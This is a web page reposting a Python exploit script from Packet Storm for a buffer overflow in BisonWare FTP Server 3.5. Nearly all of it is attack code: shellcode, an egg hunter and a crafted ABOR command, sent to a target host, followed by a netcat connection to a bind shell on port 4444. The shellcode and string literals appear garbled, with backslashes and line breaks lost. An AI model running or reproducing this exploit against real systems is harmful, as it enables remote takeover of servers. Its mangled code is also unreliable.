Home / vulnerabilities BisonWare FTP Server 3.5 Buffer Overflow
Posted on 14 May 2015
Source : packetstormsecurity.org Link
#!/usr/bin/python
# Exploit Title: BisonWare FTP Server Version 3.5 Egg Hunting Exploits
# Date: 22 April,2015
# Exploit Author: Bikash Dash
# www.vulnerableghost.com
# Version: BisonWare FTP Server Version 3.5
# Tested on: Windows XP service pack3
# CVE : [N/A]
import socket, sys, os, time
print "
================================ "
print " -----Vulnerable Gh0st------------ "
print " Bikash Dash(0xfb**) "
print " Bikash Dash, Chanchal Rastogi,manish Tanwar,Aditya Upadhaya "
print " www.vulnerableghost.com "
print "=================================
"
if len(sys.argv) != 3:
print "[*] Usage: %s <target> <port>
" % sys.argv[0]
sys.exit(0)
target = sys.argv[1] #User Passed Argument 1
port = int(sys.argv[2]) #User Passed Argument 2
shellcode = ("w00tw00t" + "xbdxa9x85x2dx7fxdaxd0xd9x74x24xf4x58x29xc9xb1"
"x56x31x68x13x83xc0x04x03x68xa6x67xd8x83x50xee"
"x23x7cxa0x91xaax99x91x83xc9xeax83x13x99xbfx2f"
"xdfxcfx2bxa4xadxc7x5cx0dx1bx3ex52x8exadxfex38"
"x4cxafx82x42x80x0fxbax8cxd5x4exfbxf1x15x02x54"
"x7dx87xb3xd1xc3x1bxb5x35x48x23xcdx30x8fxd7x67"
"x3axc0x47xf3x74xf8xecx5bxa5xf9x21xb8x99xb0x4e"
"x0bx69x43x86x45x92x75xe6x0axadxb9xebx53xe9x7e"
"x13x26x01x7dxaex31xd2xffx74xb7xc7x58xffx6fx2c"
"x58x2cxe9xa7x56x99x7dxefx7ax1cx51x9bx87x95x54"
"x4cx0exedx72x48x4axb6x1bxc9x36x19x23x09x9exc6"
"x81x41x0dx13xb3x0bx5axd0x8exb3x9ax7ex98xc0xa8"
"x21x32x4fx81xaax9cx88xe6x81x59x06x19x29x9ax0e"
"xdex7dxcax38xf7xfdx81xb8xf8x28x05xe9x56x82xe6"
"x59x17x72x8fxb3x98xadxafxbbx72xd8xf7x75xa6x89"
"x9fx77x58x3cx3cxf1xbex54xacx57x68xc0x0ex8cxa1"
"x77x70xe6x9dx20xe6xbexcbxf6x09x3fxdex55xa5x97"
"x89x2dxa5x23xabx32xe0x03xa2x0bx63xd9xdaxdex15"
"xdexf6x88xb6x4dx9dx48xb0x6dx0ax1fx95x40x43xf5"
"x0bxfaxfdxebxd1x9axc6xafx0dx5fxc8x2exc3xdbxee"
"x20x1dxe3xaax14xf1xb2x64xc2xb7x6cxc7xbcx61xc2"
"x81x28xf7x28x12x2exf8x64xe4xcex49xd1xb1xf1x66"
"xb5x35x8ax9ax25xb9x41x1fx55xf0xcbx36xfex5dx9e"
"x0ax63x5ex75x48x9axddx7fx31x59xfdx0ax34x25xb9"
"xe7x44x36x2cx07xfax37x65") #Payload prefixed with w00tw00t tag
egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7") #32 bytes egg hunter NtDisplayString
buffer = "x90"*(1063 - (len(shellcode)+len(egghunter))) #Align the stack
ebx = "x71x87xA1x7C" #JMP EBX 7CA18771from Shell32.dll
nopsled = "x90"*205 #205 NOP Sled
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port)
try:
s.connect((target,port)) #Connect to BisonWare FTP Server
s.recv(1024) #Receive 1024 bytes from BisonWare FTP Server
time.sleep(3) #Wait for 3 seconds before executing next statement
print "[+] Sending payload"
s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
s.send('USER anonymous
') #Send FTP command 'USER anonymous'
s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
s.send('PASS anonymous
') #Send FTP command 'PASS anonymous'
s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
s.send('ABOR ' + shellcode + buffer + egghunter + ebx + nopsled +'
') #Send FTP command 'ABOR '
s.close() #Close the socket
print "[+] Exploit Sent Successfully"
print "[+] Waiting for 5 sec before spawning shell to " + target + ":4444
"
print "
"
time.sleep(5) #Wait for 5 seconds before connection to Bind Shell
os.system("nc -n " + target + " 4444") #Connect to Bind Shell using netcat
print "[-] Connection lost from " + target + ":4444
"
except:
print "[-] Could not connect to " + target + ":21
"
sys.exit(0) #Exit the Exploit POC code execution
